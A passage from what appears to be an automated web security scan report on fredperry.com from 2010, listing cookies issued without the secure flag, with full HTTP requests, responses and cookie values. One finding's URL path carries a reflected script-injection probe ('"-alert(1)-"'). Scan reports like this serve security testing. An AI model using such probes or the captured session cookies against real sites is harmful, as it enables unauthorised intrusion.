Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d2mk5crl1cvamj39pbaqgfbh74; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.fredperry.com/customer/account/login/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3.2. https://www.fredperry.com/customer/account/login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...

3.3. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may red